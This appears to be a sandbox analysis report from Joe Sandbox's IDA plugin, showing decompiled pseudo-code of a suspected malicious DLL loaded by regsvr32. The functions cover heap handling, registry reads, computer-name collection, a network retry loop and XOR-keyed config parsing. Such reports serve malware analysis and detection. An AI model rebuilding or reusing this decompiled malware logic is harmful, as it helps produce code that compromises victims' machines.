                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
• Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp
• Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp
• Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp
• Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: Trim
                                • String ID:
                                • API String ID: 3043112668-0
                                • Opcode ID: b84fcb53ae6b0db0387b8540f750fdbf4e19fad20833d317347387ed0a9e67cd
                                • Instruction ID: 21ca2d72411a1cf1b64e18f2f1591c3e1fcb92f0b0bb2f5c777616f973d34021
                                • Opcode Fuzzy Hash: b84fcb53ae6b0db0387b8540f750fdbf4e19fad20833d317347387ed0a9e67cd
                                • Instruction Fuzzy Hash: B001B1723003076FE7204E6A8C58FE77BADEBC5744F445091B9A9CB242EA30C842C764
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E02BD8B22(void* _a4) {
                                				char _t2;
                                
                                				_t2 = RtlFreeHeap( *0x2bdd238, 0, _a4); // executed
                                				return _t2;
                                			}

                                0x02bd8b2e
                                0x02bd8b34

                                APIs
                                • RtlFreeHeap.NTDLL(00000000,00000000,02BD131A,00000000,?,?,00000000), ref: 02BD8B2E
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
• Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp
• Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp
• Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp
• Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: FreeHeap
                                • String ID: Ut
                                • API String ID: 3298025750-8415677
                                • Opcode ID: 20974fe05cb102635bc119f8f5131776fed704fb8051230172934826ba705844
                                • Instruction ID: 80a7ca99cd6296de59368790750bb7dcabf9193b8725f0cf3929c63705ce3ac5
                                • Opcode Fuzzy Hash: 20974fe05cb102635bc119f8f5131776fed704fb8051230172934826ba705844
                                • Instruction Fuzzy Hash: 51B01272981100ABCA114B80DE14F45FE21AB50780F004815B384C5074D3314430FB15
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 75%
                                			E02BD76E7(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
                                				void* _v8;
                                				void* __esi;
                                				intOrPtr* _t35;
                                				void* _t40;
                                				intOrPtr* _t41;
                                				intOrPtr* _t43;
                                				intOrPtr* _t45;
                                				intOrPtr* _t50;
                                				intOrPtr* _t52;
                                				void* _t54;
                                				intOrPtr* _t55;
                                				intOrPtr* _t57;
                                				intOrPtr* _t61;
                                				intOrPtr* _t65;
                                				intOrPtr _t68;
                                				void* _t72;
                                				void* _t75;
                                				void* _t76;
                                
                                				_t55 = _a4;
                                				_t35 =  *((intOrPtr*)(_t55 + 4));
                                				_a4 = 0;
                                				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
                                				if(_t76 < 0) {
                                					L18:
                                					return _t76;
                                				}
                                				_t40 = E02BD8A19(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
                                				_t76 = _t40;
                                				if(_t76 >= 0) {
                                					_t61 = _a28;
                                					if(_t61 != 0 &&  *_t61 != 0) {
                                						_t52 = _v8;
                                						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
                                					}
                                					if(_t76 >= 0) {
                                						_t43 =  *_t55;
                                						_t68 =  *0x2bdd2a8; // 0x242a5a8
                                						_t20 = _t68 + 0x2bde1fc; // 0x740053
                                						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
                                						if(_t76 >= 0) {
                                							_t76 = E02BDA6BC(_a4);
                                							if(_t76 >= 0) {
                                								_t65 = _a28;
                                								if(_t65 != 0 &&  *_t65 == 0) {
                                									_t50 = _a4;
                                									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
                                								}
                                							}
                                						}
                                						_t45 = _a4;
                                						if(_t45 != 0) {
                                							 *((intOrPtr*)( *_t45 + 8))(_t45);
                                						}
                                						_t57 = __imp__#6;
                                						if(_a20 != 0) {
                                							 *_t57(_a20);
                                						}
                                						if(_a12 != 0) {
                                							 *_t57(_a12);
                                						}
                                					}
                                				}
                                				_t41 = _v8;
                                				 *((intOrPtr*)( *_t41 + 8))(_t41);
                                				goto L18;
                                			}

                                0x02bd76ed
                                0x02bd76f0
                                0x02bd7700
                                0x02bd7709
                                0x02bd770d
                                0x02bd77db
                                0x02bd77e1
                                0x02bd77e1
                                0x02bd7727
                                0x02bd772c
                                0x02bd7730
                                0x02bd7736
                                0x02bd773b
                                0x02bd7742
                                0x02bd7751
                                0x02bd7751
                                0x02bd7755
                                0x02bd7757
                                0x02bd7763
                                0x02bd776e
                                0x02bd7779
                                0x02bd777d
                                0x02bd7787
                                0x02bd778b
                                0x02bd778d
                                0x02bd7792
                                0x02bd7799
                                0x02bd77a9
                                0x02bd77a9
                                0x02bd7792
                                0x02bd778b
                                0x02bd77ab
                                0x02bd77b0
                                0x02bd77b5
                                0x02bd77b5
                                0x02bd77b8
                                0x02bd77c1
                                0x02bd77c6
                                0x02bd77c6
                                0x02bd77cb
                                0x02bd77d0
                                0x02bd77d0
                                0x02bd77cb
                                0x02bd7755
                                0x02bd77d2
                                0x02bd77d8
                                0x00000000

                                APIs
                                  • Part of subcall function 02BD8A19: SysAllocString.OLEAUT32(80000002), ref: 02BD8A76
                                  • Part of subcall function 02BD8A19: SysFreeString.OLEAUT32(00000000), ref: 02BD8ADC
                                • SysFreeString.OLEAUT32(?), ref: 02BD77C6
                                • SysFreeString.OLEAUT32(02BD4BD8), ref: 02BD77D0
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
• Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp
• Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp
• Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp
• Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: String$Free$Alloc
                                • String ID:
                                • API String ID: 986138563-0
                                • Opcode ID: 4ebfbfe153c896c391142d6d7508bc7caa79ae350499682ef3926ddce34f8ef5
                                • Instruction ID: d66ab24398251d17c4e192f3f21b010b499168653f07395ce9b9e912a1da7230
                                • Opcode Fuzzy Hash: 4ebfbfe153c896c391142d6d7508bc7caa79ae350499682ef3926ddce34f8ef5
                                • Instruction Fuzzy Hash: A1311776900119EFCB11DFA4C888CDBBB7AFBC97447154A98F8199B220E731DD51DBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E02BD5D79(intOrPtr* __edi, void* _a4, intOrPtr _a8, unsigned int _a12) {
                                				void* _t21;
                                				void* _t22;
                                				signed int _t24;
                                				intOrPtr* _t26;
                                				void* _t27;
                                
                                				_t26 = __edi;
                                				if(_a4 == 0) {
                                					L2:
                                					_t27 = E02BD7DDD(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
                                					if(_t27 == 0) {
                                						_t24 = _a12 >> 1;
                                						if(_t24 == 0) {
                                							_t27 = 2;
                                							HeapFree( *0x2bdd238, 0, _a4);
                                						} else {
                                							_t21 = _a4;
                                							 *((short*)(_t21 + _t24 * 2 - 2)) = 0;
                                							 *_t26 = _t21;
                                						}
                                					}
                                					L6:
                                					return _t27;
                                				}
                                				_t22 = E02BD1037(_a4, _a8, _a12, __edi); // executed
                                				_t27 = _t22;
                                				if(_t27 == 0) {
                                					goto L6;
                                				}
                                				goto L2;
                                			}

                                APIs
                                  • Part of subcall function 02BD1037: SysFreeString.OLEAUT32(00000000), ref: 02BD109A
                                • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,74E5F710,?,00000000,?,00000000,?,02BD5356,?,004F0053,05009368,00000000,?), ref: 02BD5DDC
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: Free$HeapString
                                • String ID: Ut
                                • API String ID: 3806048269-8415677
                                • Opcode ID: 22b060029f01e66e88809b8c57000369b460084e77feeba37d613e0fb73189cb
                                • Instruction ID: 2ff547d50915061c3a21f39dbfa984bb8e61351beff35337e19c1f65e9e6d661
                                • Opcode Fuzzy Hash: 22b060029f01e66e88809b8c57000369b460084e77feeba37d613e0fb73189cb
                                • Instruction Fuzzy Hash: CE016D32501619BBCF329F54CC04FEA7B65FF08790F948469FE099A124E731C960DBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 37%
                                			E02BD831C(void* __ecx) {
                                				signed int _v8;
                                				void* _t15;
                                				void* _t19;
                                				void* _t20;
                                				void* _t22;
                                				intOrPtr* _t23;
                                
                                				_t23 = __imp__;
                                				_t20 = 0;
                                				_v8 = _v8 & 0;
                                				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
                                				_t10 = _v8;
                                				if(_v8 != 0) {
                                					_t20 = E02BD1525(_t10 + 1);
                                					if(_t20 != 0) {
                                						_t15 =  *_t23(3, _t20,  &_v8); // executed
                                						if(_t15 != 0) {
                                							 *((char*)(_v8 + _t20)) = 0;
                                						} else {
                                							E02BD8B22(_t20);
                                							_t20 = 0;
                                						}
                                					}
                                				}
                                				return _t20;
                                			}

                                APIs
                                • GetComputerNameExA.KERNEL32(00000003,00000000,02BD9C7E,74E5F710,00000000,?,?,02BD9C7E), ref: 02BD8334
                                  • Part of subcall function 02BD1525: RtlAllocateHeap.NTDLL(00000000,00000000,02BD1278), ref: 02BD1531
                                • GetComputerNameExA.KERNEL32(00000003,00000000,02BD9C7E,02BD9C7F,?,?,02BD9C7E), ref: 02BD8351
                                  • Part of subcall function 02BD8B22: RtlFreeHeap.NTDLL(00000000,00000000,02BD131A,00000000,?,?,00000000), ref: 02BD8B2E
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: ComputerHeapName$AllocateFree
                                • String ID:
                                • API String ID: 187446995-0
                                • Opcode ID: aaf26258d6541254c1abdb1bb85e563cea15d9a83473fdf61f898377a386f59d
                                • Instruction ID: 4df589a008b0a2008f819b25f4215bbd938dc110160e3fa6120736b2d086ef43
                                • Opcode Fuzzy Hash: aaf26258d6541254c1abdb1bb85e563cea15d9a83473fdf61f898377a386f59d
                                • Instruction Fuzzy Hash: A2F05466600205BFEB11D69E8D01FEF76FDEBC5665F110095B509D7140FA70DA02C770
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                				intOrPtr _t4;
                                				void* _t10;
                                				void* _t11;
                                				void* _t12;
                                				void* _t14;
                                
                                				_t14 = 1;
                                				_t4 = _a8;
                                				if(_t4 == 0) {
                                					if(InterlockedDecrement(0x2bdd23c) == 0) {
                                						E02BD4DB1();
                                					}
                                				} else {
                                					if(_t4 == 1 && InterlockedIncrement(0x2bdd23c) == 1) {
                                						_t10 = E02BD2789(_t11, _t12, _a4); // executed
                                						if(_t10 != 0) {
                                							_t14 = 0;
                                						}
                                					}
                                				}
                                				return _t14;
                                			}

                                APIs
                                • InterlockedIncrement.KERNEL32(02BDD23C), ref: 02BD7F12
                                  • Part of subcall function 02BD2789: HeapCreate.KERNEL32(00000000,00400000,00000000,?,00000001,?,?,?,02BD7F25,?), ref: 02BD279C
                                • InterlockedDecrement.KERNEL32(02BDD23C), ref: 02BD7F32
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: Interlocked$CreateDecrementHeapIncrement
                                • String ID:
                                • API String ID: 3834848776-0
                                • Opcode ID: 1834d2fe66a7bf31aceae50defcb0daeef92ccf766cd70f9bc1b42d1635501de
                                • Instruction ID: abcb4c7d2dfd328ada81c36819d9e0693c5f0e39abba276e3c2a125c59b3f67b
                                • Opcode Fuzzy Hash: 1834d2fe66a7bf31aceae50defcb0daeef92ccf766cd70f9bc1b42d1635501de
                                • Instruction Fuzzy Hash: E6E04F31248163939B315A74CC84BEAEA50DB007C8F2198D4F8C2D1050FB10C850F691
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E02BD933A(signed int* __ecx, intOrPtr _a4, signed int* _a8, signed int* _a12) {
                                				intOrPtr _v12;
                                				signed int _v20;
                                				intOrPtr _v24;
                                				signed int _v60;
                                				char _v68;
                                				void* __ebx;
                                				void* __edi;
                                				void* __esi;
                                				intOrPtr _t14;
                                				signed int* _t16;
                                				signed int _t25;
                                				signed int _t26;
                                				signed int* _t28;
                                				signed int _t30;
                                
                                				_t28 = __ecx;
                                				_t14 =  *0x2bdd2c8; // 0x5009618
                                				_v12 = _t14;
                                				_t16 = _a12;
                                				_t30 = 8;
                                				if(_t16 != 0) {
                                					 *_t16 =  *_t16 & 0x00000000;
                                				}
                                				do {
                                					_t31 =  &_v68;
                                					if(E02BD8C01( &_v68) == 0) {
                                						goto L16;
                                					}
                                					_t30 = E02BD97F7(_t31, _a4, _v12);
                                					if(_t30 == 0) {
                                						_t25 = E02BD5988(_t31, _t28); // executed
                                						_t30 = _t25;
                                						if(_t30 != 0) {
                                							if(_t30 == 0x102) {
                                								E02BDD000 = E02BDD000 + 0xea60;
                                							}
                                						} else {
                                							if(_v24 != 0xc8) {
                                								_t30 = 0xe8;
                                							} else {
                                								_t26 = _v20;
                                								if(_t26 == 0) {
                                									_t30 = 0x10d2;
                                								} else {
                                									_t28 = _a8;
                                									if(_t28 != 0) {
                                										_v60 = _v60 & _t30;
                                										 *_t28 = _v60;
                                										_t28 = _a12;
                                										if(_t28 != 0) {
                                											 *_t28 = _t26;
                                										}
                                									}
                                								}
                                							}
                                						}
                                					}
                                					E02BD58DB( &_v68, 0x102, _t28, _t30);
                                					L16:
                                				} while (_t30 == 0x2f19 && WaitForSingleObject( *0x2bdd26c, 0) == 0x102);
                                				return _t30;
                                			}

                                APIs
                                • WaitForSingleObject.KERNEL32(00000000,00000000,00000000,74E481D0), ref: 02BD93EC
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: ObjectSingleWait
                                • String ID:
                                • API String ID: 24740636-0
                                • Opcode ID: 0d235ef39af7f117893c089e49ceefc08b86f0414f0630ec27fe37f7f3d8ed7a
                                • Instruction ID: 4b098b22ad5152a46a29b21e611c693010936452c93defdaae527d836c47087c
                                • Opcode Fuzzy Hash: 0d235ef39af7f117893c089e49ceefc08b86f0414f0630ec27fe37f7f3d8ed7a
                                • Instruction Fuzzy Hash: E721C032B01A4A9BDF10DE19C864BEE77A6EB807B4F1084A5E405E72C0F770D811CB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 34%
                                			E02BD1037(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                				intOrPtr _v12;
                                				void* _v18;
                                				char _v20;
                                				intOrPtr _t15;
                                				void* _t17;
                                				intOrPtr _t19;
                                				void* _t23;
                                
                                				_v20 = 0;
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosw");
                                				_t15 =  *0x2bdd2a8; // 0x242a5a8
                                				_t4 = _t15 + 0x2bde39c; // 0x5008944
                                				_t20 = _t4;
                                				_t6 = _t15 + 0x2bde124; // 0x650047
                                				_t17 = E02BD76E7(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
                                				if(_t17 < 0) {
                                					_t23 = _t17;
                                				} else {
                                					_t23 = 8;
                                					if(_v20 != _t23) {
                                						_t23 = 1;
                                					} else {
                                						_t19 = E02BD7EA4(_t20, _v12);
                                						if(_t19 != 0) {
                                							 *_a16 = _t19;
                                							_t23 = 0;
                                						}
                                						__imp__#6(_v12);
                                					}
                                				}
                                				return _t23;
                                			}

                                APIs
                                  • Part of subcall function 02BD76E7: SysFreeString.OLEAUT32(?), ref: 02BD77C6
                                  • Part of subcall function 02BD7EA4: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,02BD51D4,004F0053,00000000,?), ref: 02BD7EAD
                                  • Part of subcall function 02BD7EA4: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,02BD51D4,004F0053,00000000,?), ref: 02BD7ED7
                                  • Part of subcall function 02BD7EA4: memset.NTDLL ref: 02BD7EEB
                                • SysFreeString.OLEAUT32(00000000), ref: 02BD109A
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: FreeString$lstrlenmemcpymemset
                                • String ID:
                                • API String ID: 397948122-0
                                • Opcode ID: b9fd2933bb8afe5522e88a34f8368386f09c35572aaea41a45f72d45be206ab2
                                • Instruction ID: f9ed947d2958727e58154438220d61433f9ab52622116d6de864dbab3d8a45bd
                                • Opcode Fuzzy Hash: b9fd2933bb8afe5522e88a34f8368386f09c35572aaea41a45f72d45be206ab2
                                • Instruction Fuzzy Hash: F2017C32910159BFDB12AFADCC00DEABBB9EB05354F4185A5E908E7060F771D921CB90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Non-executed Functions

                                C-Code - Quality: 96%
                                			E02BD7FBE(int* __ecx) {
                                				int _v8;
                                				void* _v12;
                                				void* _v16;
                                				void* __esi;
                                				signed int _t28;
                                				signed int _t33;
                                				signed int _t39;
                                				char* _t45;
                                				char* _t46;
                                				char* _t47;
                                				char* _t48;
                                				char* _t49;
                                				char* _t50;
                                				void* _t51;
                                				void* _t52;
                                				void* _t53;
                                				intOrPtr _t54;
                                				void* _t56;
                                				intOrPtr _t57;
                                				intOrPtr _t58;
                                				signed int _t61;
                                				intOrPtr _t64;
                                				signed int _t65;
                                				signed int _t70;
                                				void* _t72;
                                				void* _t73;
                                				signed int _t75;
                                				signed int _t78;
                                				signed int _t82;
                                				signed int _t86;
                                				signed int _t90;
                                				signed int _t94;
                                				signed int _t98;
                                				void* _t103;
                                				intOrPtr _t121;
                                
                                				_t104 = __ecx;
                                				_t28 =  *0x2bdd2a4; // 0x69b25f44
                                				if(E02BD6247( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x90) {
                                					 *0x2bdd2d8 = _v8;
                                				}
                                				_t33 =  *0x2bdd2a4; // 0x69b25f44
                                				if(E02BD6247( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
                                					_v12 = 2;
                                					L69:
                                					return _v12;
                                				}
                                				_t39 =  *0x2bdd2a4; // 0x69b25f44
                                				if(E02BD6247( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
                                					L67:
                                					HeapFree( *0x2bdd238, 0, _v16);
                                					goto L69;
                                				} else {
                                					_t103 = _v12;
                                					if(_t103 == 0) {
                                						_t45 = 0;
                                					} else {
                                						_t98 =  *0x2bdd2a4; // 0x69b25f44
                                						_t45 = E02BD9403(_t104, _t103, _t98 ^ 0x7895433b);
                                					}
                                					if(_t45 != 0) {
                                						_t104 =  &_v8;
                                						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
                                							 *0x2bdd240 = _v8;
                                						}
                                					}
                                					if(_t103 == 0) {
                                						_t46 = 0;
                                					} else {
                                						_t94 =  *0x2bdd2a4; // 0x69b25f44
                                						_t46 = E02BD9403(_t104, _t103, _t94 ^ 0x219b08c7);
                                					}
                                					if(_t46 != 0) {
                                						_t104 =  &_v8;
                                						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
                                							 *0x2bdd244 = _v8;
                                						}
                                					}
                                					if(_t103 == 0) {
                                						_t47 = 0;
                                					} else {
                                						_t90 =  *0x2bdd2a4; // 0x69b25f44
                                						_t47 = E02BD9403(_t104, _t103, _t90 ^ 0x31fc0661);
                                					}
                                					if(_t47 != 0) {
                                						_t104 =  &_v8;
                                						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
                                							 *0x2bdd248 = _v8;
                                						}
                                					}
                                					if(_t103 == 0) {
                                						_t48 = 0;
                                					} else {
                                						_t86 =  *0x2bdd2a4; // 0x69b25f44
                                						_t48 = E02BD9403(_t104, _t103, _t86 ^ 0x0cd926ce);
                                					}
                                					if(_t48 != 0) {
                                						_t104 =  &_v8;
                                						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
                                							 *0x2bdd004 = _v8;
                                						}
                                					}
                                					if(_t103 == 0) {
                                						_t49 = 0;
                                					} else {
                                						_t82 =  *0x2bdd2a4; // 0x69b25f44
                                						_t49 = E02BD9403(_t104, _t103, _t82 ^ 0x3cd8b2cb);
                                					}
                                					if(_t49 != 0) {
                                						_t104 =  &_v8;
                                						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
                                							 *0x2bdd02c = _v8;
                                						}
                                					}
                                					if(_t103 == 0) {
                                						_t50 = 0;
                                					} else {
                                						_t78 =  *0x2bdd2a4; // 0x69b25f44
                                						_t50 = E02BD9403(_t104, _t103, _t78 ^ 0x2878b929);
                                					}
                                					if(_t50 == 0) {
                                						L41:
                                						 *0x2bdd24c = 5;
                                						goto L42;
                                					} else {
                                						_t104 =  &_v8;
                                						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
                                							goto L41;
                                						} else {
                                							L42:
                                							if(_t103 == 0) {
                                								_t51 = 0;
                                							} else {
                                								_t75 =  *0x2bdd2a4; // 0x69b25f44
                                								_t51 = E02BD9403(_t104, _t103, _t75 ^ 0x261a367a);
                                							}
                                							if(_t51 != 0) {
                                								_push(_t51);
                                								_t72 = 0x10;
                                								_t73 = E02BDA0FD(_t72);
                                								if(_t73 != 0) {
                                									_push(_t73);
                                									E02BD9FF6();
                                								}
                                							}
                                							if(_t103 == 0) {
                                								_t52 = 0;
                                							} else {
                                								_t70 =  *0x2bdd2a4; // 0x69b25f44
                                								_t52 = E02BD9403(_t104, _t103, _t70 ^ 0xb9d404b2);
                                							}
                                							if(_t52 != 0 && E02BDA0FD(0, _t52) != 0) {
                                								_t121 =  *0x2bdd32c; // 0x50095b0
                                								E02BD1128(_t121 + 4, _t68);
                                							}
                                							if(_t103 == 0) {
                                								_t53 = 0;
                                							} else {
                                								_t65 =  *0x2bdd2a4; // 0x69b25f44
                                								_t53 = E02BD9403(_t104, _t103, _t65 ^ 0x3df17130);
                                							}
                                							if(_t53 == 0) {
                                								L59:
                                								_t54 =  *0x2bdd2a8; // 0x242a5a8
                                 								_t22 = _t54 + 0x2bde252; // 0x616d692f = "/ima" little-endian; fallback string used when this config value is missing
                                								 *0x2bdd2d4 = _t22;
                                								goto L60;
                                							} else {
                                								_t64 = E02BDA0FD(0, _t53);
                                								 *0x2bdd2d4 = _t64;
                                								if(_t64 != 0) {
                                									L60:
                                									if(_t103 == 0) {
                                										_t56 = 0;
                                									} else {
                                										_t61 =  *0x2bdd2a4; // 0x69b25f44
                                										_t56 = E02BD9403(_t104, _t103, _t61 ^ 0xd2079859);
                                									}
                                									if(_t56 == 0) {
                                										_t57 =  *0x2bdd2a8; // 0x242a5a8
                                 										_t23 = _t57 + 0x2bde791; // 0x6976612e = ".avi" little-endian; fallback string used when this config value is missing
                                										_t58 = _t23;
                                									} else {
                                										_t58 = E02BDA0FD(0, _t56);
                                									}
                                									 *0x2bdd340 = _t58;
                                									HeapFree( *0x2bdd238, 0, _t103);
                                									_v12 = 0;
                                									goto L67;
                                								}
                                								goto L59;
                                							}
                                						}
                                					}
                                				}
                                			}

                                APIs
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,02BD30F3,?,69B25F44,?,02BD30F3,69B25F44,?,02BD30F3,69B25F44,00000005,02BDD00C,00000008), ref: 02BD8063
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,02BD30F3,?,69B25F44,?,02BD30F3,69B25F44,?,02BD30F3,69B25F44,00000005,02BDD00C,00000008), ref: 02BD8095
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,02BD30F3,?,69B25F44,?,02BD30F3,69B25F44,?,02BD30F3,69B25F44,00000005,02BDD00C,00000008), ref: 02BD80C7
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,02BD30F3,?,69B25F44,?,02BD30F3,69B25F44,?,02BD30F3,69B25F44,00000005,02BDD00C,00000008), ref: 02BD80F9
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,02BD30F3,?,69B25F44,?,02BD30F3,69B25F44,?,02BD30F3,69B25F44,00000005,02BDD00C,00000008), ref: 02BD812B
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,02BD30F3,?,69B25F44,?,02BD30F3,69B25F44,?,02BD30F3,69B25F44,00000005,02BDD00C,00000008), ref: 02BD815D
                                • HeapFree.KERNEL32(00000000,02BD30F3,02BD30F3,?,69B25F44,?,02BD30F3,69B25F44,?,02BD30F3,69B25F44,00000005,02BDD00C,00000008,?,02BD30F3), ref: 02BD825B
                                • HeapFree.KERNEL32(00000000,?,02BD30F3,?,69B25F44,?,02BD30F3,69B25F44,?,02BD30F3,69B25F44,00000005,02BDD00C,00000008,?,02BD30F3), ref: 02BD826E
                                  • Part of subcall function 02BDA0FD: lstrlen.KERNEL32(69B25F44,00000000,7673D3B0,02BD30F3,02BD8241,00000000,02BD30F3,?,69B25F44,?,02BD30F3,69B25F44,?,02BD30F3,69B25F44,00000005), ref: 02BDA106
                                  • Part of subcall function 02BDA0FD: memcpy.NTDLL(00000000,?,00000000,00000001,?,02BD30F3), ref: 02BDA129
                                  • Part of subcall function 02BDA0FD: memset.NTDLL ref: 02BDA138
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                 • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp
                                 • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp
                                 • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp
                                 • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: FreeHeap$lstrlenmemcpymemset
                                • String ID: Ut
                                • API String ID: 3442150357-8415677
                                • Opcode ID: ef443b17eb561d085dbe8cf4dac3afaacb5b1adc21c9d40d031cbe8d6ee209ff
